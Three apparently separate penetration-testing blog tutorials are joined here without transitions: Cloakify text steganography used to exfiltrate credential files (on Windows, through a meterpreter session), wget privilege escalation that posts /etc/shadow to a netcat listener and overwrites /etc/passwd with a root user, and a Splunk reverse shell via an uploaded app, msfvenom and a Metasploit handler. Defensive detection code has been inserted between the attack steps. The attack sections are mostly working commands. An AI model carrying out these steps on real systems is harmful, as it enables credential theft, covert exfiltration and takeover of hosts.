Cloakify-Factory: A Data Exfiltration Tool That Uses Text-Based Steganography


In our previous post we discussed “Cloud Storage Uploads for Data Exfiltration”; today we are going to discuss “Concealed Methods for Data Exfiltration”, i.e. how unauthorized data is extracted. Here you will learn how an intruder can exfiltrate data through a steganography approach.

Table of Content
· Overview
· About Data Exfiltration
· Cloakify Installation and Usage (for Linux)
· Method I
· Method II
· Cloakify Installation and Usage (for Windows)

Overview
We will perform a red team exercise in which we attempt to collect important files from the victim's machine by applying steganography through concealed methods. When copying information from the target machine, we will transform the data to fool network monitors so that they cannot identify the data packets travelling across the network.
All this can be performed with a single tool named “Cloakify Factory”.
Cloakify Factory transforms any file type (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight and transfer it without triggering alerts. The fancy term for this is “text-based steganography”: hiding data by making it look like other data. Cloaked files defeat signature-based malware detection tools.

About Data Exfiltration
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation, and is considered a form of data theft. During the past couple of decades, a number of data exfiltration incidents have severely damaged the consumer confidence, corporate valuation and intellectual property of businesses, and the national security of governments across the world.


Methods of Data Exfiltration
Open Methods:
· HTTP/HTTPS Downloads & Uploads
· FTP
· Email
· Instant Messaging
· P2P filesharing
Concealed Methods:
· SSH
· VPN
· Protocol Tunneling
· Steganography
· Timing channel

Cloakify Installation & Usages (for Linux)
CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection.
You only need to type the following to download Cloakify from GitHub onto the target machine (the repository checks out into a directory named Cloakify, and the noise generators live under noiseTools):
git clone https://github.com/TryCatchHCF/Cloakify.git
cd Cloakify
chmod -R 777 noiseTools


Let's run the Python script to launch cloakifyFactory.py:
python cloakifyFactory.py
CloakifyFactory is a menu-driven tool that leverages Cloakify Toolset scripts. When you choose to Cloakify a file, the scripts first Base64-encode the payload, then apply a cipher to generate a list of strings that encodes the Base64 payload. You then transfer the file however you wish to its desired destination. Once exfiltrated, choose Decloakify with the same cipher to decode the payload.
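The transform just described is easy to reason about once written out, and the same structure is what a DLP rule can key on. The following Python is an added example (not code from the original post or from the Cloakify project): it reproduces the Base64-then-substitute step with a constructed 65-entry placeholder vocabulary rather than one of Cloakify's real cipher lists, and adds a structural check a defender could run over an outbound text file: a cloaked file is a long list of lines drawn from at most 65 distinct strings (64 Base64 symbols plus the '=' pad), and its line count is a multiple of 4 because Base64 output always is. The thresholds in looks_cloaked are assumptions to tune for a given environment.

```python
import base64
from typing import Dict, List

# Constructed placeholder vocabulary for the example: one string per Base64
# symbol plus one for '=' padding (65 entries). Cloakify ships its own lists
# (emoji, starTrek, pokemonGo, ...); this is not one of them.
B64_SYMBOLS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
CIPHER = ["word%02d" % i for i in range(len(B64_SYMBOLS))]
SYMBOL_TO_WORD = dict(zip(B64_SYMBOLS, CIPHER))
WORD_TO_SYMBOL = {word: sym for sym, word in SYMBOL_TO_WORD.items()}


def cloak(data: bytes) -> List[str]:
    """Base64-encode the payload, then emit one vocabulary line per Base64 symbol."""
    encoded = base64.b64encode(data).decode("ascii")
    return [SYMBOL_TO_WORD[ch] for ch in encoded]


def decloak(lines: List[str]) -> bytes:
    """Map each line back to its Base64 symbol and decode the payload."""
    encoded = "".join(WORD_TO_SYMBOL[line.strip()] for line in lines)
    return base64.b64decode(encoded)


def cloak_indicators(lines: List[str]) -> Dict[str, object]:
    """Structural features of a line-oriented text that a DLP rule can score."""
    rows = [line.strip() for line in lines if line.strip()]
    n = len(rows)
    distinct = len(set(rows))
    return {
        "lines": n,
        "distinct": distinct,
        "vocab_ratio": (distinct / n) if n else 0.0,
        # Base64 output length is always a multiple of 4, so the line count is too
        "multiple_of_4": n > 0 and n % 4 == 0,
    }


def looks_cloaked(lines: List[str], max_vocab: int = 65, min_lines: int = 260) -> bool:
    """Heuristic (thresholds are assumptions): a long file whose lines come from a
    vocabulary no larger than the Base64 alphabet, with a line count divisible by 4."""
    f = cloak_indicators(lines)
    return f["lines"] >= min_lines and f["distinct"] <= max_vocab and f["multiple_of_4"]


if __name__ == "__main__":
    sample = b"user: admin\npassword: constructed-sample\n" * 20  # constructed payload
    cloaked = cloak(sample)
    print(len(cloaked), "lines, first four:", cloaked[:4])
    print("indicators:", cloak_indicators(cloaked))
    print("looks cloaked:", looks_cloaked(cloaked))
    assert decloak(cloaked) == sample
```

Note that Cloakify's optional noise generators prepend extra tokens to each line, which inflates the distinct-line count; a production rule would strip the leading token before scoring, as removeNoise.py does on the receiving side.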


Let's take an example: we want to copy a text file "pwd.txt" from within the target system, which contains the login credentials of different machines in the network.


Method I
It may be dangerous to copy the text file directly, so we will transform the input file's data into another file as output. To do so, follow the steps below:
1. Run the Python script to launch cloakifyFactory.py
2. Press 1 to select the "Cloakify a File" option
3. Enter the path of the source file that you want to transform as the input file.
4. Enter the path of the destination file where you want to save the output.

Next you will get a list of ciphers; choose the desired option for encoding the file. Suppose I want the whole content changed into facial emojis:
1. Press 3 for the emoji cipher
2. Allow noise to be added to the cloaked file by pressing Y for yes.
3. Then press 1 to select prependEmoji.py as the noise generator.

This will save the output inside the raj.txt file.


As a result you will get output content like that shown in the image below.


Now if you want to obtain the output in its original format, use the Decloakify option, which reverts the transformation to the original content; but before that you have to give all permissions to removeNoise.py:
chmod 777 removeNoise.py


To do so, follow the steps below:
1. Run the Python script to launch cloakifyFactory.py
2. Press 2 to select the "Decloakify a File" option
3. Enter the path of the file that you want to restore to its original format.
4. Enter the path of the file where you want to save the output.


Press Y to answer yes, because we added noise to the cloaked file, and select the same noise generator.


Method II
Again, we have a similar file that we want to cloak into another format directly, without operating the CloakifyFactory console.



This time you can use a single command to cloak the file by specifying the type of cipher, as given below:
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek
After executing the above command, the output will look something like that shown in the image below.


Here we have used file.txt as the destination file to save the transformed content, without printing the output on screen. Then we used decloakify.py on that cloaked file, with the same cipher, to revert it to its original state.
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek > /root/Desktop/file.txt
python decloakify.py /root/Desktop/file.txt ciphers/starTrek


Cloakify Installation and Usages (For Windows)

As we all know this is an exfiltration tool, and data can be exfiltrated from any platform, whether Linux or Windows, so CloakifyFactory is built for both. In the first phase we used the Python-based application on a Linux machine; now we are going to remotely deploy Cloakify Factory on a Windows machine, using the Python MSI package to run our Python-based application.
Thus, we downloaded the MSI package in our local machine (Kali Linux):
wget https://www.python.org/ftp/python/2.7/python-2.7.msi


Our purpose now is to show how an intruder can remotely exfiltrate data using CloakifyFactory. So we first compromised the system and obtained a meterpreter session, then uploaded the MSI package to the victim's machine to install the Python dependency:
upload python-2.7.msi .
shell
msiexec /i python-2.7.msi /qn


Now download the zip file of CloakifyFactory from GitHub to your local machine.


We also need to download the 7-Zip command-line executable for extracting cloakify-master.zip.


Now extract 7za920.zip and you will get the 7za.exe file, which we have to push to the victim's machine.


Now let's upload 7za.exe and cloakify-master.zip to the remote system, then use 7za.exe to unzip cloakify-master.zip. Execute the following commands:
upload /root/Downloads/Cloakify-master.zip .
upload /root/Downloads/7za.exe
shell
7za.exe x cloakify-master.zip


Now we want to transfer the secret.txt file from the compromised machine, but directly copying the file might generate an alert, so we will transform the data as done above.


Again we convert the content of secret.txt by hiding it inside a cloaked file. It is as simple as before, with a small modification: we run cloakify.py with the Python interpreter we just installed.
C:\Python27\python.exe cloakify.py C:\Users\raj\Desktop\secret.txt ciphers\pokemonGo > dump.txt
type dump.txt
Thus we can observe that with the help of Cloakify we have transformed the file into a form that cannot easily be detected.
Conclusion: Cloakify Factory can be very useful for exfiltrating data, as we saw it has many cipher scripts used to cloak data files, and hence it is a very effective tool for performing text-based steganography.

Linux for Pentester: Wget Privilege Escalation


In this article we are going to describe the utility of the wget command and how vital it is in Linux penetration testing. Since wget is used for downloading files from a server, here we will learn what else we can do with this command in privilege escalation.

Table of Content
Introduction to Wget
· Major operations performed using Wget
Exploiting Wget
· Sudo rights lab setup for privilege escalation
· Exploiting sudo rights
· SUID lab setup for privilege escalation
· Exploiting SUID

Introduction to Wget
The wget command is a command-line utility that lets the user download single or multiple files simultaneously from the internet or a server using protocols such as HTTP, HTTPS and FTP. It supports many operations useful when downloading files: downloading multiple files, downloading in the background, resuming downloads, renaming a downloaded file, and mirror downloading.

More of this command's functionality can be understood from its help output, obtained with the -h argument. The image below shows the list of arguments that can be used with wget. To view it, simply type the following in your Linux terminal:

wget -h


Major Operation performed using Wget
To download a file: wget lets the user download any file or web page either in the foreground of the current terminal or in the background. Here I'm downloading putty.exe to show the overall working of wget. Type the command below to download a single file, using the simple syntax: wget [option] URL
wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
To download a file in the background: wget is a non-interactive downloader, so it can download a file in the background without interfering with the current process.
Here I'm using the -b argument for this task, as shown in the command below.


To save the download under another file name: The image below shows how to write the downloaded content to a file of a different name, using the -O (uppercase) argument.
Type the command below for this, in which I download putty.exe and save the output as raj.exe.

Halfway through the download I pause it by pressing Ctrl+C, stopping the download mid-session, just to explain how we can resume a download interrupted by a network failure, power cut or any other reason.

To resume a download: As mentioned above, if any problem interrupts the download, we can resume the incomplete download with the -c argument. Find the command below, as per the screenshot:




To download multiple files simultaneously: wget also lets the user download multiple files at once instead of one by one. Suppose we have a file containing multiple links and we want to download all of them together; for this we use the -i argument.
Here I'm creating a file named “link” containing two links, and I want to download both together. Type the commands below to perform this task:
cat link
wget -i link




To turn off output: To silence a download we use the -q argument, which turns off standard output so the file downloads in complete silence.
We will use wget with the -q argument for this, as shown below.
There are many more options in wget, but in this post we have discussed only a few, because our aim is to demonstrate privilege escalation by exploiting wget; in the next phase you will learn how to exploit wget to escalate to a root shell.


Exploiting wget
Sudo Rights Lab setups for privilege Escalation
Now we will set up our lab with wget granted higher privilege, i.e. administrative rights. As we know, the behaviour of many commands changes once they run with higher privileges; similarly, we will check what impact sudo rights have on wget and how we can use it for privilege escalation.

Refer to this link for more information about sudo rights.

The image below shows that I have created a local user (test) who has been granted a sudo right to run wget as root.
To add the sudo right, open the /etc/sudoers file and add the following line under the user privilege specification (the path is case-sensitive, so it must match the real binary, /usr/bin/wget):
test        ALL=(root) NOPASSWD: /usr/bin/wget


Now we will start exploiting wget by taking advantage of the sudoers permission. Suppose we got a session on the victim's machine that gives us local user access to the target, through which we can escalate to root.
First we connect to the target machine with ssh; type the following command to log in as the local user.
Then we look for the sudo rights of user “test” (if any) and find that user “test” can execute wget as “root” without a password:
sudo -l
wget provides the --post-file option, which sends the content of any file as the body of an HTTP POST. So here we will use wget to transfer the content of the /etc/shadow file.
Syntax: sudo /usr/bin/wget --post-file=<file> <listener address>
Since --post-file will transfer the content of the shadow file to the listening IP, we must first start a listener on the destination machine. Hence open a new terminal and start a netcat listener to receive the data sent from the source machine.
Type the command below:
sudo /usr/bin/wget --post-file=/etc/shadow 192.168.1.17



We had already started the netcat listener on port 80 to receive the content into the “hash” file:
nc -lvp 80 > hash


After this we have the content of the victim's shadow file inside our hash file, and we use John the Ripper to crack the hashes.
Syntax: john <hash file>
john hash

Hmmm!! As we can observe from the image below, it has cracked the password for user raj.


Since we got the credentials for the account of user raj, we can now switch to that user and then try to reach a root shell by switching again:

su raj
sudo su

And finally we got root access; in this way we spawned a root shell by exploiting the wget command.


SUID Lab setups for privilege Escalation
SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of the file's owner. Files with the SUID permission run with higher privileges. Assume we are accessing the target system as a non-root user and we find SUID-enabled binaries owned by root; those files/programs/commands then run with root privileges.
Now we are going to give SUID permission to wget so that a local user can run wget with root's privilege.
Hence type the following to enable the SUID bit (chmod takes a lowercase s for the setuid bit):
which wget
chmod u+s /usr/bin/wget
ls -al /usr/bin/wget


Exploiting SUID
Now compromise the target system again and use the find command to identify binaries with SUID permission:

find / -perm -u=s -type f 2>/dev/null

So here we come to know that the SUID bit is enabled on many binaries, but we are interested in /usr/bin/wget.
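The same find is what a defender should run on a schedule, but raw output is only useful against a known-good list: a binary such as wget gaining the setuid bit is the signal. The following Python is an added example (not from the original post) that walks a tree the way find -perm -4000 -type f does (the -u=s form above is equivalent) and reports setuid files that are not in an approved baseline. The tree, the baseline and the file names in demo() are constructed in a temporary directory for the demonstration.

```python
import os
import stat
import tempfile
from typing import List, Set


def find_suid(root: str) -> List[str]:
    """Return sorted paths of regular files under root with the setuid bit set.
    Equivalent to: find ROOT -perm -4000 -type f"""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(root: str, baseline: Set[str]) -> List[str]:
    """Setuid files whose path (relative to root, written with a leading '/')
    is not in the approved baseline; wget shows up here after 'chmod u+s'."""
    result = []
    for path in find_suid(root):
        rel = "/" + os.path.relpath(path, root).replace(os.sep, "/")
        if rel not in baseline:
            result.append(rel)
    return result


def demo() -> List[str]:
    """Build a throwaway tree (constructed for the example) and run the check."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "usr", "bin")
        os.makedirs(bindir)
        # passwd is legitimately setuid, wget has been made setuid, ls is normal
        for name, suid in (("passwd", True), ("wget", True), ("ls", False)):
            path = os.path.join(bindir, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, 0o4755 if suid else 0o755)
        baseline = {"/usr/bin/passwd"}  # constructed approved list
        return unexpected_suid(root, baseline)


if __name__ == "__main__":
    print("unexpected setuid files:", demo())
```

On a real host, generate the baseline once from a freshly built system with find_suid("/") and diff against it on every run; any new entry, wget included, deserves a ticket.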



As we know, wget has SUID permission; taking advantage of this we will try to escalate to root by injecting a new user into the /etc/passwd file.
First we read /etc/passwd with the tail command, which prints the end of the file and shows us that it ends with the user “test”.



Now we create a salted password hash for our new user using “openssl”, with the command shown in the screenshot below.

openssl passwd -1 -salt ignite pass123

We get a hash value like this: “$1$ignite$3eTbJm980Hz.k1NTdNxe1”; copy it for further use.


Moving ahead, I have now copied the entire content of /etc/passwd to our local machine and will add a new record for the user “ignite”, pasting the hash copied above into the record as shown below.



Name this file passwd and run the Python HTTP server to transfer it to the victim's machine:
python -m SimpleHTTPServer


Now we want to place our modified passwd file in the /etc directory, replacing the original. We use wget with -O to download the passwd file from our machine (Kali Linux) into /etc, which overwrites the existing passwd file.
cd /etc

Now let's switch to ignite, which has root's privileges, and access the root shell:
su ignite
password: pass123
id
Hence you can notice from the image below that we have escalated to root by abusing the SUID permission on wget.
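Both wget abuses in this article leave artefacts a defender can check for: the --post-file exfiltration puts shadow-format records into an outbound HTTP POST body, and the -O overwrite leaves /etc/passwd with a second UID 0 account whose password field carries a hash instead of "x". The following Python is an added example (not code from the original post) with two small checks, one per artefact, run over constructed samples embedded in the block; the HTTP capture and the hash values are placeholders, not real credentials.

```python
import re
from typing import Dict, List

# Constructed capture of what a listener would receive from
# 'wget --post-file=/etc/shadow <host>'; hashes are placeholders, not real.
SAMPLE_POST_CAPTURE = """POST / HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Host: 192.168.1.17
Content-Type: application/x-www-form-urlencoded
Content-Length: 160

root:$6$c0nstructed$PLACEHOLDERHASHrootXXXXXXXX:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
raj:$1$ignite$PLACEHOLDERHASHrajXXXXXXXXX:18000:0:99999:7:::
"""

# Constructed /etc/passwd containing the injected record described above
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
test:x:1000:1000:test:/home/test:/bin/bash
ignite:$1$ignite$PLACEHOLDERHASHigniteXXXXXX:0:0::/root:/bin/bash
"""

# A shadow record: name, crypt(3) hash ($1$ MD5, $5$ SHA-256, $6$ SHA-512,
# $y$ yescrypt), then the seven remaining colon-separated ageing fields.
SHADOW_RECORD = re.compile(
    r"^(?P<user>[a-z_][a-z0-9_-]*):(?P<hash>\$(?:1|5|6|y)\$[^:\s]+)(?::[^:\s]*){7}$",
    re.MULTILINE,
)


def shadow_users_in(text: str) -> List[str]:
    """Usernames whose hashed shadow record appears in text (e.g. a POST body)."""
    return [m.group("user") for m in SHADOW_RECORD.finditer(text)]


def audit_passwd(text: str) -> List[Dict[str, str]]:
    """Flag passwd records that indicate the injection above: an extra UID 0
    account, or a password field that is not the shadow placeholder 'x'."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"line": str(lineno), "user": fields[0], "issue": "malformed record"})
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and user != "root":
            findings.append({"line": str(lineno), "user": user, "issue": "extra UID 0 account"})
        if pw not in ("x", "*", "!", "!!"):
            findings.append({"line": str(lineno), "user": user, "issue": "password field is not shadowed"})
    return findings


if __name__ == "__main__":
    print("shadow records in capture:", shadow_users_in(SAMPLE_POST_CAPTURE))
    for f in audit_passwd(SAMPLE_PASSWD):
        print("passwd line %s (%s): %s" % (f["line"], f["user"], f["issue"]))
```

The first check belongs in an egress proxy or IDS content rule; the second is a cheap host integrity check that can run alongside the SUID baseline diff, and it would also catch a record with an empty password field.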

Penetration Testing on Splunk


In this article we are going to exploit Splunk using a reverse shell. This can be useful when penetration testing the Splunk environment of your own IT infrastructure.

Table of Content
· Introduction to Splunk
· Deploying Splunk on Ubuntu
· Exploiting Splunk using a reverse shell

What is SPLUNK?
Splunk Enterprise Security (ES) is a security information and event management (SIEM) solution that provides insight into machine data generated from security technologies such as network, endpoint, access, malware, vulnerability and identity information. It is a premium application that is licensed independently from Splunk core.
Splunk (the product) captures, indexes, and correlates real-time data in a searchable repository from which it can generate graphs, reports, alerts, dashboards, and visualizations.
For more information, read here.

Deploying SPLUNK on UBUNTU
Now we continue with penetration testing of Splunk on the Linux platform (here Ubuntu); the same can be performed on Windows as well.
Visit https://www.splunk.com and register there to download the free trial version of Splunk. Since we are going to continue with Ubuntu, we downloaded Splunk for Linux 64-bit (the .tgz file).
Once it is downloaded on your Ubuntu machine, follow the process below to create a Splunk instance:
Open a terminal, go to Downloads and extract the file (note the option order: f must be followed by the archive name):
tar -zxvf splunk-7.3.0-657388c7a488-Linux-x86_64.tgz



Now follow these commands for installing splunk:
mv splunk /opt
cd /opt
cd splunk
cd bin/
/opt/splunk/bin/splunk start --accept-license
When asked enter the username and password you need to configure for splunk.



Once done you should see the following screen with the URL of your Splunk GUI.



Go to http://ubuntu:8000 (url of your splunk GUI) and enter the user id and password you configured earlier:





Exploiting SPLUNK using reverse shell
In the first phase we discussed how to deploy Splunk on our local machine (Ubuntu); in this phase we move on to Splunk penetration testing, where we try to exploit Splunk to obtain a reverse shell on the machine.
To exploit Splunk, first download the latest release of the shell app from the following link:



Now log in to the Splunk GUI from your Kali machine by visiting the IP of the Ubuntu server on port 8000 (192.168.0.37:8000).



Navigate to the “App: Search & Reporting” option and click on “Search & Reporting”



Click on the “Install app from file” option.



To install any app, Splunk provides an upload form to browse for a .spl or .tar.gz file. Taking advantage of this functionality, we upload the Splunk shell app that we downloaded previously.



After uploading restart your splunk instance.



Once restarted, go to the Apps tab again and find your installed archive (weaponize splunk for red teaming and pen testing).
We scroll down to find our shell app as shown below. Before we can run it, we need to click the “Permissions” option to change its permissions.



Click on permissions and change to all apps as shown below:



Now to execute the shell, we navigate to the search option in Splunk and type in our command, specifying that we want a standard reverse shell back to our attacking machine's IP on the listening port:
| revshell std 192.168.0.7 1234
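What makes the search above execute code is the app's custom search command: a Splunk app declares commands such as revshell in default/commands.conf, and each stanza names a script in the app's bin/ directory that Splunk runs when the command is piped into a search. Reviewing that file is therefore the first thing to do before approving any "Install app from file" upload. The following Python is an added example (not from the original post and not the shell app's own code) that lists the commands an archive declares and whether the script each one points at is actually present; the archive from build_sample_app is constructed in memory for the demonstration and is not the real app installed above.

```python
import configparser
import io
import tarfile
from typing import Dict


def build_sample_app() -> bytes:
    """Construct an in-memory .tar.gz app archive for the example. It declares two
    custom search commands; one has its script in bin/, the other does not."""
    files = {
        "demo_app/default/app.conf": "[launcher]\ndescription = constructed demo app\n",
        "demo_app/default/commands.conf": (
            "[revshell]\nfilename = revshell.py\n\n"
            "[lookupname]\nfilename = lookupname.py\n"
        ),
        "demo_app/bin/revshell.py": "# placeholder script body\n",
        # deliberately no demo_app/bin/lookupname.py
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in files.items():
            data = text.encode("utf-8")
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def custom_commands(archive: bytes) -> Dict[str, Dict[str, object]]:
    """List every custom search command the app declares (one commands.conf stanza
    each) with the script it names and whether that script exists under bin/."""
    found = {}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        members = {m.name: m for m in tar.getmembers()}
        for name, member in members.items():
            parts = name.split("/")
            if len(parts) < 3 or parts[-1] != "commands.conf" or parts[-2] not in ("default", "local"):
                continue
            app_root = "/".join(parts[:-2])
            conf = configparser.ConfigParser(interpolation=None, strict=False)
            conf.read_string(tar.extractfile(member).read().decode("utf-8", "replace"))
            for stanza in conf.sections():
                script = conf.get(stanza, "filename", fallback=None)
                found[stanza] = {
                    "app": app_root,
                    "scope": parts[-2],
                    "filename": script,
                    "script_present": bool(script) and (app_root + "/bin/" + script) in members,
                }
    return found


if __name__ == "__main__":
    for cmd, info in custom_commands(build_sample_app()).items():
        print("| %-12s -> %s (script present: %s)" % (cmd, info["filename"], info["script_present"]))
```

Any declared command whose script you have not read, or whose name suggests shell access, is reason to reject the upload; restricting who holds the admin capability that allows app installation at all is the broader control.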



Now go to Kali Linux and open a terminal.
Start netcat with the following command on any port you wish (here I used 1234):
nc -lvp 1234
Hmmm!! As you can observe, executing the id command shows root uid and gid information, but to obtain a proper tty shell we need to break out of the restricted shell.



We used msfvenom to create a Python payload:
msfvenom -p cmd/unix/reverse_python lhost=192.168.0.7 lport=4444 R



The payload is delivered through our existing netcat session: all that needs to be done is to paste the payload into the terminal and execute it, but do not forget to start a netcat listener in a new terminal first.



A new netcat session arrives on the port (4444) that we defined in the payload and we see the execution occur flawlessly. Once this session is established, run the following command:
python -c 'import pty;pty.spawn("/bin/bash")'
After executing the command we can see that a proper shell is gained.



Meterpreter session
If you are hoping for a meterpreter session, you can use the multi handler to receive the reverse connection from the victim's machine:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.0.7
msf exploit(multi/handler) > set lport 9999
msf exploit(multi/handler) > exploit -j



Type following to execute reverse shell
| revshell msf 192.168.0.7 9999



Boooom!! We got the meterpreter session.
And in this way we saw Splunk penetration testing.